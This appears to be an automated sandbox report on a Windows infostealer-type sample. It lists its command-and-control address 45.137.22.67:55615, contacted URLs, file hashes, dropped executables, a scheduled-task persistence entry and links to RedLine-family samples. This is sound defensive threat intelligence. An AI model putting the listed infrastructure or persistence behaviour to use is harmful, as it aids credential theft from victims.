http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
45.137.22.67:55615	3%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	Virustotal		Browse
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	1%	Virustotal		Browse
http://45.137.22.67:55615t-	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	Avira URL Cloud	safe
http://www.aforgenet.com/framework/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	1%	Virustotal		Browse
http://tempuri.org/0	0%	Virustotal		Browse
http://schemas.xmlsoap.org/soap/actor/next	0%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdate	1%	Virustotal		Browse
http://www.aforgenet.com/framework/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.137.22.67:55615/	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
45.137.22.67:55615	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://45.137.22.67:55615	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb	AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip	AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w3.or	AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	PO.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/0	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
http://45.137.22.67:55615t-	AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.aforgenet.com/framework/	PO.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.137.22.67	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1457840
Start date and time:	2024-06-15 20:21:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	w4XFffGDz1.exe renamed because original name is a hash value
Original Sample Name:	2185ecde5380054ad075b7a25ae0ea51.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/104@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 393 Number of non-executed functions: 84
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:22:03	API Interceptor	34x Sleep call for process: PO.exe modified
14:22:09	API Interceptor	37x Sleep call for process: powershell.exe modified
14:22:13	API Interceptor	45x Sleep call for process: AJzHYZtQIb.exe modified
14:22:13	API Interceptor	1x Sleep call for process: w4XFffGDz1.exe modified
20:22:11	Task Scheduler	Run new task: AJzHYZtQIb path: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	ZVKDbYLukd.exe	Get hash	malicious	RedLine	Browse	45.137.22.68
	ccf8db74632bae4cedb4401ce2ce21ed0f656e1d869577f731ecf00a0cc3818f_dump.exe	Get hash	malicious	RedLine	Browse	45.137.22.111
	tdmMbgf2u2.exe	Get hash	malicious	RedLine	Browse	45.137.22.111
	xFV3JxX1zK.rtf	Get hash	malicious	Unknown	Browse	185.222.58.78
	Product Specification Details.xls	Get hash	malicious	Remcos	Browse	185.222.58.78
	Teklif talebi.xls	Get hash	malicious	AgentTesla	Browse	185.222.58.78
	vw5ZOiGUyl.exe	Get hash	malicious	GuLoader	Browse	185.222.58.62
	RFQ 8968792.xls	Get hash	malicious	AgentTesla	Browse	185.222.58.78
	Payment_Advice-pdf.exe	Get hash	malicious	Remcos	Browse	45.137.22.103
	MWsRU5nbvJ.exe	Get hash	malicious	RedLine	Browse	45.137.22.173

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCZfIfSKRHmOugw1s
MD5:	236CE6553B5DB20FA0B07F9FEA88F4A4
SHA1:	AEB5B156162EC5CD4E0BC3A0BA0F0D4739D40DBD
SHA-256:	3849E9437770B9804D942D293FFAB3C6449B82BA23C0CD3D48DE2C318938FCAD
SHA-512:	90B07AFD72EE353BEA8E2C7ECBB8CDAFB965C91E1B32C5FFE971F60C69004FDEBF5BA429B4DD455210772D2494A8AD60930A8F01C289D0199998A7CC36050FD6
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Download File

Process:	C:\Users\user\Desktop\w4XFffGDz1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	743944
Entropy (8bit):	7.615457036874597
Encrypted:	false
SSDEEP:	12288:Sxtg61jjk0LAta9A15fraDI+Jpaf6F+CfdGoZ8LFCSz4vtwD/zxmkR:wg61jjk0LAta9A+DIMaf6MCF18LXz
MD5:	86F98523CEB67DF5CC3431A839F63134
SHA1:	160A60824E1ADC4C0FFD5959341C6DAE4DA2E76B
SHA-256:	0E43D560502493DFADE28C5822081232EE47FD42C233F9FF473C467E51297E27
SHA-512:	CD6D79DBF6E8EC3663570F584760DB9AC50E190B4CC6E12630CB31796A88912B26556B08E01E803D3EC06874263FBDEB9AC73C8C5CD67E2749D32EBA7A23C7B7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 58%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.gf..............0..............#... ...@....@.. ....................................@.................................."..O....@..L............$...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......."..............@..B................."......H.......P...."..........P...p+...........................................0..\........(.....(.....{....r...po.....{....r...p(.......(.......(....rC..p(....o.....{....r...po....br...p( ...&.{.....o!.....("...z.,..{....,..{....o#.....($....0...........s%...}.....s&...}.....s'...}.....s(...}.....s%...}.....{....o)....(*....{.....o+....{....r-..p"..@A.. ....s,...o-....{.... ......s....o/....{....r?..po0....{.....9..s1...o2....{.....o3....{....rU..po.....{.....o+....{....r-..p"

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.jpg

Download File

Process:	C:\Users\user\Desktop\w4XFffGDz1.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 390x552, components 3
Category:	dropped
Size (bytes):	49161
Entropy (8bit):	7.9640442162988965
Encrypted:	false
SSDEEP:	768:LWTHytOtCeYfsfd8HAeA5Sz8Q3X1taN5adCKWEnMAyk8n/syo:qTj7Yfsfd8Ha5Sz/nHaN5adrlYsf
MD5:	E83CCB51EE74EFD2A221BE293D23C69A
SHA1:	4365CA564F7CDD7337CF0F83AC5FD64317FB4C32
SHA-256:	DA931852A19A707D01C3EDF138622B8601056C42525F8AC40CB48AF43A7410CC
SHA-512:	0252E629FBDAFDB66FF63EF76D18F25D1CA46AC3EFF019F012361DB45EBD34D1A7A9AD35F7A2FC5830676C771997633F3ABF1DC3224BD8F6BD55456B0A554A46
Malicious:	false
